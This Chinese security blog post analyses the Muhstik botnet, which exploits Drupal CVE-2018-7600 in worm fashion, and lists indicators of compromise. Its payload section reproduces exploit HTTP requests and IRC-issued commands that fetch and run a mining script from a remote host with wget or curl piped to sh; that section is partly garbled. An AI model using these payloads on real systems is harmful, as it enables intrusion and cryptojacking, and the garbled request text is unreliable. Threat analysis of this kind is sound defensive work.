僵尸网络 Muhstik 正在积极利用 Drupal 漏洞 CVE-2018-7600 蠕虫式传播

时间:2018-04-20

2018年3月28日,Drupal.org 公布了漏洞 CVE-2018-7600 的修复方案。Drapal 是一个开源的内容管理系统,由PHP语言写成,有很多网站使用 Drupal 向外提供网页服务。本次漏洞存在于 Drupal 的多个版本中,攻击者可以利用该漏洞完全控制网站。从2018年4月13日开始,360网络安全研究院观测到互联网上有大量针对该漏洞的扫描。通过分析,我们认为有至少3组恶意软件在利用该漏洞传播。其中一组恶意软件有蠕虫传播行为,感染量显著比其他的恶意软件更多。分析后,我们认为这是一个长期存在的僵尸网络家族。我们将其命名为 muhstik,这主要是因为其二进制文件名和通信协议中多处包含了这个字符串。我们认为 muhstik 有以下特点值得社区关注:

  • 蠕虫式传播
  • 长期存在
  • 使用的漏洞利用数目众多
  • 混合使用了多种牟利方式

攻击载荷

按照时间顺序,Muhstik使用了下面两组攻击载荷,这两组载荷占据了全部看到的载荷的80%左右,是我们看到的攻击的主要部分:

  • #1 活跃时间:2018-04-14 03:33:06~ 2018-04-17 15:40:58
  • #2 活跃时间:2018-04-16 19:38:39~至今

对应的攻击来源,其 IP 地址非常分散,而且基本都运行着 Drupal 程序。攻击来源自身是攻击载荷的易感染目标,这是蠕虫式传播的重要指标,引起了我们的警觉。两组攻击载荷的详细信息如下:

POST  
/user/register?element_parents=account/mail/%23value Win64; x64)  
Host: {target}  
Content-Type: application/x-www-form-urlencoded  
Content-length: 2048  
form_id=user_register_form Win64; x64)  
Host: {target}  
Content-Type: application/x-www-form-urlencoded  
Content-length: 170  
form_id=user_register_form chmod +x /tmp/aiox86) > /dev/null 2> chmod +x /tmp/aioarm) > /dev/null 2> chmod +x /tmp/aiomipsel) > /dev/null 2> chmod +x /tmp/aiomips) > /dev/null 2> chmod +x /tmp/aioppc) > /dev/null 2> chmod +x /tmp/aioi586) > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!i* SH /tmp/aioi586 amazon > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!i* SH /tmp/aioi586 dedi > /dev/null 2>&1 &

#muhstik-i586 #植入xmrig32挖矿程序

:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!* SH wget -qO - http://104.236.26.43/xmrt32.sh | sh > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!* SH curl http://104.236.26.43/xmrt32.sh | sh > /dev/null 2>&1 &

Muhstik 可能来源已久

通过对 Muhstik 相关域名的历史溯源,我们发现 Muhstik 由来已久,跟以下域名有较为强烈的关联关系。

dasan.deutschland-zahlung.eu  
134.ip-51-254-219.eu  
uranus.kei.su  
wireless.kei.su  
www.kei.su  
y.fd6fq54s6df541q23sdxfg.eu

IoC

Muhstik C2 List

139.99.101.96:9090    AS16276 OVH SAS  
144.217.84.99:9090    AS16276 OVH SAS  
145.239.84.0:9090    AS16276 OVH SAS  
147.135.210.184:9090    AS16276 OVH SAS  
142.44.163.168:9090    AS16276 OVH SAS  
192.99.71.250:9090    AS16276 OVH SAS  
142.44.240.14:9090    AS16276 OVH SAS  
121.128.171.44:9090    AS4766 Korea Telecom    #当前未生效  
66.70.190.236:9090    AS16276 OVH SAS #当前未生效  
145.239.93.125:9090    AS16276 OVH SAS  
irc.de-zahlung.eu:9090        #当前未生效

Muhstik Malware URL

hxxp://51.254.221.129/c/cron  
hxxp://51.254.221.129/c/tfti  
hxxp://51.254.221.129/c/pftp  
hxxp://51.254.221.129/c/ntpd  
hxxp://51.254.221.129/c/sshd  
hxxp://51.254.221.129/c/bash  
hxxp://51.254.221.129/c/pty  
hxxp://51.254.221.129/c/shy  
hxxp://51.254.221.129/c/nsshtfti  
hxxp://51.254.221.129/c/nsshcron  
hxxp://51.254.221.129/c/nsshpftp  
hxxp://51.254.221.129/c/fbsd  
hxxp://191.238.234.227/x/aiox86

Muhstik Malware MD5

c37016e34304ff4a2a0db1894cdcdb92     #Muhstik样本模块  
da17dc1438bb039968a5737c6fbc88cd     #Muhstik扫描模块

上一篇:基于Openresty的云WAF工作原理 下一篇:知物由学 | AI网络安全实战:生成对抗网络

联系老师 微信扫一扫关注我们 15527777548/18696195380 在线咨询
关闭